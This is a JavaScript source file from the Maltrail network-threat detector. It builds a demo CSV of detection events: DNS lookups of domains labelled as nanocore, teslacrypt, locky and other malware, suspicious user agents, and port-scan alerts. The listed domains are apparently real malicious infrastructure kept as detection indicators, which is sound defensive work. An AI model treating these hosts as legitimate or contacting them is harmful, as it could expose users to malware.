/*
* Copyright (c) 2014-2021 Maltrail developers (https://github.com/stamparm/maltrail/)
* See the file 'LICENSE' for copying permission
*/

function getDemoCSV() {
    return '"2021-01-11 00:00:08.595056" r2d2 10.3.160.42 19373 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:00:08.696215" r2d2 10.3.160.42 19373 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:00:08.801140" r2d2 10.3.160.42 19373 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:00:09.695322" r2d2 10.3.160.42 19373 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:00:10.194858" r2d2 10.3.160.42 19373 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:00:11.040691" r2d2 2.200.110.232 64123 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:00:11.042279" r2d2 2.200.107.146 5838 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:00:11.066683" r2d2 2.200.110.233 64965 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:00:41.058792" r2d2 10.1.19.42 58939 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:01:21.082932" r2d2 2.200.110.232 64273 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:01:21.116817" r2d2 2.200.110.233 63699 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:01:43.385292" r2d2 2.200.110.232 65166 2.200.107.168 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 00:01:43.385322" r2d2 2.200.110.232 64006 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:01:43.393853" r2d2 2.200.107.146 7563 199.249.120.1 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 00:01:59.618012" r2d2 2.200.110.232 64592 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:02:08.785224" r2d2 10.3.160.42 19374 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:02:08.886505" r2d2 10.3.160.42 19374 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:02:09.184780" r2d2 10.3.160.42 19374 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:02:09.485032" r2d2 10.3.160.42 19374 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:02:09.885116" r2d2 10.3.160.42 19374 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:02:10.641139" r2d2 2.200.110.232 49302 2.200.107.168 53 UDP DNS juronu.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:02:10.643670" r2d2 2.200.107.146 25866 205.251.196.248 53 UDP DNS juronu.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:02:27.937377" r2d2 2.200.110.233 64414 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:02:31.145230" r2d2 2.200.110.232 65305 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:02:31.182246" r2d2 2.200.110.233 65332 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:02:39.269045" r2d2 2.200.105.226 58118 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:02:59.609125" r2d2 2.200.110.232 64021 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:02:59.615149" r2d2 2.200.107.146 43326 194.62.183.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:02:59.623531" r2d2 2.200.110.232 65237 2.200.107.168 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:02:59.626891" r2d2 2.200.107.146 8843 185.24.64.42 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:03:05.900297" r2d2 2.200.110.232 64356 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 00:03:07.371576" r2d2 2.200.110.232 64618 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 00:03:07.377137" r2d2 2.200.107.146 46370 205.251.194.217 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 00:03:16.918272" r2d2 10.1.140.58 53904 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:03:16.918262" r2d2 10.1.140.58 53904 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:03:16.918270" r2d2 10.1.140.58 53904 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:03:32.000022" r2d2 2.200.108.59 18559,18560,18566,18567,18569,18570,18572,18573,18574,18577,18578,18579,18580,18583,18586,18588,18589,18590,18591,18593,18594,18595,18597,18599,18600,18602,18603,18607,18609,18610,18611,18615,18617,18618,18620,18621,32880,33138,33148,33432,33828,34292,34372,34500,34716,34738,34754,34816,35056,35598,35670,36964,36967,36969,36974,36976,37564,38128,38630,38632,38660,38728,39240,40608,41202,41558,41738,41820,42892,43264,44044,44834,45414,45820,46098,46140,46786,46884,47698,49206,49716,49800,50360,50362,50762,51026,51124,52058,52724,53078,53114,53348,53976,54834,55454,55518,55584,55670,55696,55800,55844,55912,56090,56832,56862,56920,56942,57074,57214,57716,57922,57966,58874,59256,59630,59640,59776,59839,59842,59848,59850,59851,59964,60224,60396 77.53.81.105 21,5947,7547,7678,9139,9599,9770,11321,11670,11720,11864,12251,12529,12681,12869,13033,13560,15984,16382,18377,18503,20134,20583,21232,21580,21981,23486,23558,25514,25663,25693,26603,27784,28347,28658,28738,28981,29209,33841,34273,34575,35238,35295,36415,36908,37280,37662,39771,40372,40752,40873,42240,44561,44702,46102,46122,46193,46239,46629,47653,49231,50716,50795,52649,53237,54735,55406,56852,57717,57943,57979,59817,60010,60863,61330,62378,63411,63828,63993,64313 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:03:32.000201" r2d2 2.200.108.59 18558,18562,18564,18571,18572,18575,18576,18577,18578,18585,18586,18587,18591,18592,18594,18596,18598,18599,18601,18604,18605,18606,18612,18616,18617,18623,18624,18625,18626,18627,18630,18633,18635,18636,18638,18641,33148,33248,33298,33466,33690,33828,33842,34076,34192,34272,34470,34738,35670,35748,36030,36096,36382,36928,36965,36967,36969,36970,36971,36972,36975,36979,36980,37086,37414,37436,37614,37908,37954,38086,38290,38308,38316,38360,38656,38660,38822,38886,39058,39210,39418,39670,39708,39714,39858,39910,40158,40184,40440,40608,40616,40836,41012,41202,41230,41434,41478,41774,41872,41904,41928,42406,42562,42774,43106,43158,43518,43910,44132,44266,44638,44678,44680,44802,44834,45022,45162,45820,46048,46116,46380,46448,46786,47080,47280,48106,48328,49416,49716,49732,49794,50024,50360,50362,50426,50762,51006,51066,51080,51096,51156,51182,51374,51482,51566,51674,51816,51934,52194,52344,52554,52606,52640,52702,52724,52732,52760,53056,53348,53430,53742,55220,55230,55420,55454,55464,55518,55584,55600,55696,55768,55844,56000,56090,56316,56460,56564,56568,56728,56862,56938,57016,57030,57044,57102,57266,57458,57576,57714,57716,57778,57832,57966,57972,58222,58262,58268,58608,59056,59224,59536,59674,59840,59841,59843,59846,59848,59849,59853,59854,59876,60334,60622,60700,60738 77.53.81.105 21,5012,5202,5203,5337,5822,6529,7344,7547,8108,8543,8815,9128,10158,10194,10519,10610,10735,11321,11394,11864,12251,12571,12628,12681,12743,12892,13355,13450,13497,13560,13643,14098,14772,14845,15378,15386,15984,16363,16482,17648,17964,18168,18630,20315,20340,20583,20624,20763,21074,21947,21981,23551,23807,24100,24188,24538,24919,24969,25514,25663,26781,27652,27998,28083,28118,28418,28751,28941,29106,29197,29772,30347,30461,30523,30892,31177,31502,32244,32490,32935,33112,33652,34273,34325,34439,35238,35295,35493,35763,35993,36052,36273,36284,36318,36729,36732,37122,37280,37418,37503,37719,37958,38683,39457,39490,39513,40275,40657,41000,41310,41403,42240,42916,43347,43680,44014,44098,44658,44702,45432,45764,45975,45996,46239,46629,48504,49717,50122,50684,50795,52364,52753,52924,53012,53259,53304,53791,54942,55087,55403,56451,57417,57717,57869,57943,57979,58685,59100,60704,61082,61262,61582,61661,62168,62732,62825,63620,63828,63993,64007,64076,65057,65110 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:03:32.000630" r2d2 2.200.108.59 18558,18562,18563,18564,18567,18569,18570,18575,18580,18581,18582,18583,18585,18588,18593,18596,18601,18602,18604,18607,18609,18610,18612,18614,18615,18618,18619,18620,18622,18623,18625,18626,18628,18633,18636,18639,18642,18643,18647,18650,18654,18655,18656,18660,18661,18663,18665,18666,18668,18670,18674,18677,18679,18680,18683,18684,18685,32834,32868,32880,33232,33432,33466,33914,33916,33936,33948,34164,34192,34292,34406,34466,34500,34610,34752,34754,35002,35056,35188,35204,35332,35334,35532,35598,35634,35748,35868,36030,36036,36096,36382,36518,36736,36964,36966,36968,36970,36972,36973,36975,36985,36988,36989,36991,37488,37614,37908,37948,38086,38098,38290,38308,38400,38552,38630,38632,38656,38868,38914,39210,39240,39412,39418,39500,39538,39830,39910,39944,40184,40208,40238,40440,40540,40616,40790,40862,41180,41246,41478,41736,41738,41820,41874,41904,41942,42130,42338,42340,42434,42454,42470,42506,42562,42728,42876,42970,42982,43158,43166,43264,43674,44044,44218,44402,44526,44608,44800,44900,45022,45132,45162,45310,45446,45544,45820,45968,45996,46058,46140,46310,46484,46586,46654,46884,47036,47080,47266,47268,47444,47638,47694,47844,47998,48328,48496,48664,48794,49128,49206,49530,49532,49554,49570,49666,49682,49732,49800,49896,50010,50172,50638,51006,51026,51100,51182,51252,51374,51482,51508,51566,51706,51724,51760,51934,51944,51974,52256,52344,52416,52606,52702,52714,52760,53078,53114,53144,53430,53976,54012,54176,54666,54760,54834,55180,55232,55580,55674,55800,55908,56274,56446,56474,56540,56562,56568,56802,56832,56920,56942,56992,57016,57030,57102,57266,57458,57576,57598,57660,57714,57752,57764,57778,57922,57972,58164,58216,58468,58504,58524,58874,58970,58978,59074,59432,59442,59536,59630,59632,59640,59668,59764,59840,59843,59844,59847,59851,59854,59856,59857,59859,59860,59861,59862,59864,59984,60330,60334,60376,60382,60476,60622,60646,60660,60712 77.53.81.105 21,5012,5072,5337,5381,5505,5673,5947,5991,6523,6664,7344,7632,7678,8027,8332,8604,9241,9964,10005,10158,10395,10885,11720,12136,12184,12389,12492,12529,12568,12571,12628,12743,12945,13023,13111,13214,13578,14039,14098,14255,14772,14845,14886,15249,15265,15442,15594,15661,15692,16382,16482,16686,16849,17540,17897,18149,18168,18377,18914,19429,19441,19980,20295,20315,21074,21198,21232,21242,21349,21571,21620,22374,22867,23486,23558,23901,24188,24538,25206,25220,25553,25644,25693,26581,26603,27205,27614,27652,27711,27784,27830,27998,28083,28118,28418,28420,28655,28738,28751,29148,29273,29772,30523,30990,31463,31502,31838,32423,32935,33045,33368,33831,33841,34077,34439,34754,34842,35096,35307,35493,35496,35553,35560,35763,35993,36049,36052,36284,36415,36901,36908,37305,37360,37418,37662,37731,37958,38191,38683,39213,39432,39450,39490,39771,39970,40271,40752,40873,41121,41430,41439,41690,43306,43771,43868,44014,44250,44330,44698,45200,45432,45453,45657,45764,45996,46122,46193,46289,46362,46851,47184,47244,47348,47499,47653,47948,48072,48567,49520,49623,49717,49885,50122,50249,50350,50384,50788,52633,52753,53012,53237,53466,54735,55087,55365,55406,55944,56488,56607,56719,56748,56953,57268,57474,57901,58685,58890,59415,59489,59725,59817,59944,60010,60449,60553,60863,61075,61082,61330,61340,61661,61928,62732,62872,63116,63280,63745,64043,64076,64313,64692,65110,65285 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:03:41.194223" r2d2 2.200.110.232 64642 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:03:41.198461" r2d2 2.200.107.146 5984 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:03:41.223992" r2d2 2.200.110.233 64817 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:03:34.000553" r2d2 2.200.108.59 18628,18639,18640,18641,18642,18644,18646,18647,18649,18650,18651,18652,18653,18657,18658,18664,18665,18668,18671,18672,18673,18676,18678,18681,18682,32774,32834,32864,32872,33232,33248,33374,33436,33464,33790,33982,34174,34516,34590,34610,34788,35084,35192,35262,35332,35334,35518,35532,35632,35750,35752,35776,35912,36036,36380,36548,36568,36698,36734,36980,36981,36988,36990,37008,37052,37110,37114,37134,37386,37414,37430,37726,37834,37954,37974,38098,38172,38316,38552,38628,38822,38868,38940,39268,39500,39538,39658,39678,39714,39728,39922,40158,40254,40494,40594,40762,41012,41020,41158,41434,41528,41538,41656,41774,41872,41928,41942,42190,42406,42414,42434,42516,42774,42824,42890,42970,42982,43106,43166,43594,43684,43710,43912,44184,44300,44498,44608,44638,44728,44800,44832,45028,45132,45228,45240,45498,45866,45890,46048,46128,46310,46344,46350,46398,46444,46448,46524,46528,46572,46586,46738,46876,47270,47326,47346,47354,47436,47454,47532,47638,47828,47844,47998,48104,48294,48846,49202,49364,49416,49512,49534,49570,49654,49800,49818,50294,50426,50638,50686,50694,50934,51174,51180,51214,51760,52194,52256,52260,52416,52446,52626,52640,52732,53144,53300,53456,54012,54280,54306,54336,54556,54558,54760,54840,54842,54856,55180,55202,55230,55498,55600,55674,55812,55894,56064,56274,56316,56562,56672,56876,57044,57386,57972,58014,58792,59022,59074,59144,59204,59224,59488,59508,59668,59686,59764,59826,59853,59856,59859,59861,59862,59865,59866,59876,60002,60064,60230,60280,60330,60358,60382,60608,60646,60738 77.53.81.105 21,5002,5154,5202,5381,5424,5559,5793,5991,6288,6634,7273,7606,7786,7788,8027,8067,8133,8543,8815,9128,9264,9455,9614,9964,10067,10194,10494,11861,11876,12392,12492,12508,12659,12707,12892,13204,13214,13355,13450,14173,14255,14569,14590,14886,15378,16594,16753,16997,17540,17897,18149,18172,18257,18697,19368,19730,20295,20346,20624,20729,20763,21242,21349,21571,21620,22084,22225,22307,22769,22991,23095,23522,23684,24200,24637,24919,24969,25220,26539,26581,26598,26690,26781,27205,27336,27351,27667,27683,28127,28245,28267,28420,28489,28573,29196,29420,29525,30047,30395,30612,30675,31242,31463,31587,32194,32244,32569,33170,33652,33831,33918,34101,34364,34524,34754,34842,35297,36028,36049,36321,36729,36937,38191,38363,39132,39276,39714,39800,40199,40689,41310,41344,41430,41439,41737,42718,42911,42916,42978,43680,43771,44098,44250,44582,44781,44992,45078,45572,45821,46082,46189,46362,47146,47184,47761,48141,48650,49396,49631,49647,49665,49694,50249,50302,50350,50684,51739,52546,52736,52740,52869,52895,53259,53304,53466,53943,54942,55253,55290,55403,56250,56488,56719,56979,57474,57746,58009,58128,58327,58345,58515,58518,58818,58996,59100,59489,59527,60047,60553,61262,61321,61777,61928,62131,62284,62690,62756,62825,62872,63217,63280,63348,63495,63593,63620,63636,63647,64010,65004,65057 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:03:43.397121" r2d2 2.200.110.232 49462 2.200.107.168 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 00:03:43.401560" r2d2 2.200.107.146 4592 192.41.162.30 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 00:03:44.869973" r2d2 10.1.19.42 58941 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:03:36.000726" r2d2 2.200.108.59 18644,18645,18648,18649,18652,18655,18657,18658,18659,18660,18662,18663,18666,18667,18669,18671,18673,18674,18675,18676,18679,18681,18682,18684,32774,32872,33200,33374,33914,34174,34216,34946,35002,35192,35632,35642,36220,36360,36562,36694,36698,36734,36982,36984,36985,36987,36991,37052,37110,37114,37178,37386,37476,37732,37828,37948,38468,39636,39658,39922,40238,40790,40862,41080,41206,41476,41528,41586,41954,42338,42470,42890,42914,43076,43244,43266,43362,43538,43552,43576,44300,44328,44384,45172,45198,45220,45240,45372,45406,45446,45484,45544,45562,45820,45866,45996,46096,46350,46524,46572,46738,47036,47326,47354,47444,47454,47694,47766,48104,48118,49390,49490,49500,49512,49554,49876,50204,50464,50610,50902,50986,51206,51226,51244,51252,51346,51508,52260,52370,52594,52626,52714,53008,53300,53456,53590,54168,54556,54666,54840,55240,55608,55714,55812,55894,55908,56064,56138,56186,56382,56474,56672,57110,57268,57328,57386,58014,58076,58828,58978,59022,59206,59664,59826,59828,59858,59863,59864,60002,60064,60150,60712 77.53.81.105 21,5154,5559,5673,6634,6664,6937,7786,8332,8459,8560,9455,9614,10384,10723,11258,11872,11876,11909,12136,12659,12707,13378,13846,14039,14569,14590,14854,14904,15661,16971,17180,17321,17671,18172,19429,19479,19730,20265,20336,20729,22084,22210,22661,22689,23522,24626,26348,26690,26747,27256,27336,28489,29091,29109,29273,29821,30047,30141,30395,31033,31587,32039,32194,32235,32459,33117,33170,33918,34113,34364,35560,37305,37554,38427,38636,38750,39315,39803,40805,41121,41737,42978,43516,44579,44994,45297,46266,46834,46984,47146,47298,47304,47340,47761,48072,48141,48812,49279,49520,49665,50788,51096,51888,52736,52740,53064,53377,54046,54618,55365,55910,56250,57712,58327,58345,58515,58518,58764,58986,59560,59725,59944,60251,61075,61157,61340,61361,61895,62167,62221,62453,62690,63116,63405,63428,63437,63647,64043,64692,65285 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:03:40.001343" r2d2 2.200.108.59 32870,32950,33414,34292,34366,34516,34564,34608,34652,34788,34946,35786,35798,36258,36562,37024,37134,37178,37430,37726,38632,38694,38756,38920,38948,39050,39122,39174,39268,39636,39768,40088,40260,40298,40440,40670,40884,40974,41000,41068,41822,42038,42052,42120,42516,42722,42748,42914,42926,43244,43350,43362,43540,43576,43684,44160,44190,44384,45322,45498,45590,46096,46444,46510,46732,46762,46876,47148,47338,47526,47598,47634,47690,47758,47828,47848,48844,48920,48926,49100,49114,49202,49230,49364,49500,49534,49538,49694,50336,50592,50686,50694,50892,50916,50934,50986,51762,52446,52782,52796,52868,53172,53256,53712,53938,54116,54242,54280,54306,54408,54450,54520,54558,54576,54698,55038,55414,55620,55818,56048,57382,57502,57582,57706,58778,58986,59032,59144,59224,59446,59686,59794,60064,60122,60150,60232,60280,60500,60652,60694,60728,60772 77.53.81.105 5083,5302,5859,6175,7770,8067,8647,8873,8956,9606,9609,9786,10323,10494,11258,11513,11861,11927,12143,12162,14676,14854,15292,15580,15821,16594,16753,16863,16997,17101,19144,19428,19686,20393,20809,20810,21312,22262,22357,22689,22854,22958,22965,23503,23705,24097,24200,24637,25060,25324,26857,27088,27205,27256,27683,28433,28441,28473,28689,28783,28838,28996,29196,29525,30063,31080,31484,32195,32201,32459,33992,34431,34524,34850,35196,35286,35888,36618,36937,37788,38228,38363,39183,39315,39800,39803,40381,40707,41037,41217,41516,42911,43055,44582,45376,45430,46082,46234,46362,46829,46984,47034,47298,47304,47343,47527,48318,48638,48650,48691,49067,49340,49647,50566,51947,52772,52869,53617,53747,54061,54111,54846,55253,57355,57403,57513,58286,58532,58818,58986,59560,60329,60905,62092,62131,62284,62285,63437,63817,64010,64139,64616,65513 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:03:44.000167" r2d2 2.200.108.59 32988,32990,33200,33244,33284,33300,33382,33440,33442,33486,33584,34192,34324,34638,35004,35038,35154,35444,35724,35798,36254,36258,36280,36304,36354,36736,36790,36908,36922,37016,37034,37514,37610,38488,38666,38670,39076,39104,39122,39354,39560,39612,39992,40664,40682,40794,40884,41000,41458,41748,42052,42064,42130,42216,42722,42748,42872,42882,43082,43278,43306,43330,43540,43688,43904,44160,44274,44428,44794,45004,45066,45644,45760,46396,46510,46566,47338,47526,47568,47578,47676,48132,48228,48852,48920,49116,49370,49438,49876,49934,50394,50432,50668,50812,50834,50960,51024,51066,51114,51252,51774,51850,51852,52084,52104,52226,52544,52868,53172,53212,53386,53558,54356,54434,54512,54520,54556,54698,55038,55620,55758,55986,55996,56004,56186,56236,56308,56426,56480,56556,56560,56860,56884,56942,56962,57110,57582,57706,57758,58068,58484,58778,58858,58874,59032,59112,59248,59330,59402,59710,60344,60460,60554,60848,60936 77.53.81.105 5211,5715,5921,6659,6759,6891,7770,8047,8420,8873,9078,9308,9510,9529,10564,11474,11927,12045,12208,12614,12781,12867,13849,14629,15217,16052,16097,16213,17031,17324,17430,18217,18879,18887,19146,19428,20004,20010,20235,20380,20642,20731,21050,21137,21154,21312,21371,21528,21703,21762,22092,22257,22262,22310,22965,23637,23705,24097,24487,25060,25319,25702,26430,26898,27034,27206,27793,28700,29546,29953,30087,30240,30407,30921,30962,31026,31080,31114,31591,31816,31867,32201,32405,33070,33164,33914,33992,34097,34431,34727,34790,34850,34970,35286,35705,36618,37297,37621,38134,38176,39183,39421,40330,40818,40990,41037,41516,41990,43445,44400,45222,45400,46440,46834,47088,47894,48691,49201,50044,50072,50090,50939,51500,53860,53873,54175,54180,56707,56748,56805,57099,57177,57292,57355,57420,57712,57840,58176,58286,60270,60308,60343,61248,61368,61389,62221,62268,62285,62444,63340,63405,63926,64209,64304,64649 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:03:46.000060" r2d2 2.200.108.59 18688,32870,32988,33414,34284,34292,34466,34608,34638,34772,35154,35450,35724,35760,35786,36196,36242,36254,36304,36354,36372,36626,36630,36698,36790,37308,37606,38058,38378,38504,38584,38666,38670,38972,39076,39104,39354,39466,39560,39612,39790,39834,39900,40664,40670,40748,40974,41728,41984,42194,42254,42438,42640,42848,42872,42882,42912,42978,43200,43330,43350,44020,44074,44304,44428,44806,45066,45322,45336,45644,46088,46732,46868,46894,46970,47568,47578,47676,47690,47822,47922,47942,48132,48354,48592,48844,48954,49034,49114,49370,49420,49502,49538,49776,50134,50292,50432,50580,50676,50780,50834,50840,50892,51024,51106,51114,51252,51576,51580,51582,51762,51842,52226,52314,52784,52796,53048,53212,53256,53284,53438,53902,53962,54058,54552,54908,55016,55818,55934,55996,56174,56238,56426,56942,57006,57452,57858,58118,58352,58876,58890,59114,59248,59636,59794,59888,60122,60232,60392,60460,60644,60936,60956 77.53.81.105 21,5310,5689,5715,6031,7542,8590,9078,9135,9741,9786,10427,11397,11474,11513,12295,12867,13965,14031,14629,14849,15159,15317,16097,16213,16863,17031,17324,17430,17667,17915,18066,18071,18217,18887,19146,19843,19909,20004,20010,20336,20380,20809,21528,21840,23083,23503,23549,23629,23637,24487,25537,25702,26010,26022,26684,26954,27034,27379,27460,27730,27735,27793,28433,28614,28838,29275,30063,30170,30240,30650,30921,30990,31622,33164,33444,33484,33914,34363,34520,34673,34727,35196,35525,38228,38282,39019,39389,40094,40112,40330,40922,41217,41735,42488,43921,45222,45376,45430,46440,46557,46726,46931,47343,48527,48638,48760,50044,50072,50117,50199,50374,51127,51565,51683,52220,52772,53617,53747,53782,53860,53873,54175,54180,54799,55052,55119,55630,55693,55809,56183,56860,57099,57513,57676,57840,57982,57992,58394,58532,58711,58951,60154,60524,60691,61248,61999,62420,62778,63340,63546,64139,64616,65239 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:03:50.000024" r2d2 2.200.108.59 33284,33300,33382,33440,34192,34284,34390,34542,34896,35216,35760,36314,36372,36630,37120,37308,37514,37606,38058,38488,38584,39362,39466,40682,40700,41016,41454,42640,42648,43808,43904,44274,44806,46002,46088,46226,46700,46714,47676,47822,48388,48592,48904,49420,49934,50134,50458,50506,50840,51774,51816,51842,51850,52048,52784,53284,53386,53438,53902,54356,55426,56004,56174,56184,56238,56556,56786,56860,58352,58624,58874,58876,58890,60554,60644,60956 77.53.81.105 5689,6363,9204,9305,9510,9529,10427,10564,11397,12045,12781,14091,14656,15015,15509,17667,18071,18215,18930,19503,19909,20336,20731,21371,21840,23083,25319,25537,26010,26676,27206,28700,30030,30087,30170,30407,30650,31456,31591,34308,34363,34520,34790,35525,35705,39595,39804,40052,40094,40313,42488,42638,45400,46557,46726,50374,51127,52220,54765,55661,55693,55809,56805,57522,57982,60343,60524,60691,60956,61847,62420,63546,64157,64209,64649,64692,65173 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:03:54.000358" r2d2 2.200.108.59 18688,34340,36276,38646,40748,41016,45336,46700,48388,51582,52560,54446,59888 77.53.81.105 21,6363,9135,15159,16024,17320,24042,25471,26022,26676,39019,42638,56567 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:04:04.782531" r2d2 2.200.109.177 1876 8.8.8.8 53 UDP DNS (sv1.iotak).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:04:09.581429" r2d2 2.200.107.168 53 2.200.106.65 55132 UDP DNS (btmaq).com "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:04:14.932614" r2d2 2.200.110.232 65074 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 00:04:14.936269" r2d2 2.200.107.146 7781 185.104.28.19 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 00:04:43.383624" r2d2 2.200.110.232 64886 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:04:43.389374" r2d2 2.200.107.146 57339 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:04:43.400689" r2d2 2.200.110.232 65254 2.200.107.168 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:04:43.408111" r2d2 2.200.107.146 46827 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:04:43.400338" r2d2 2.200.110.232 64565 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:04:46.599596" r2d2 178.17.174.14 41246 2.200.109.24 80 TCP UA "IE0006_ver1 (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee; IE0006_ver1;EN_US\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:04:51.259719" r2d2 2.200.110.233 64373 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:05:06.953992" r2d2 2.200.110.232 63491 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:05:06.993717" r2d2 2.200.110.233 64231 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:05:21.427645" r2d2 10.1.19.42 58942 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:05:25.565411" r2d2 178.17.174.14 44274 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; FunWebProducts; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; McAfee; .NET4.0E\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:05:57.805021" r2d2 2.200.110.233 63381 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
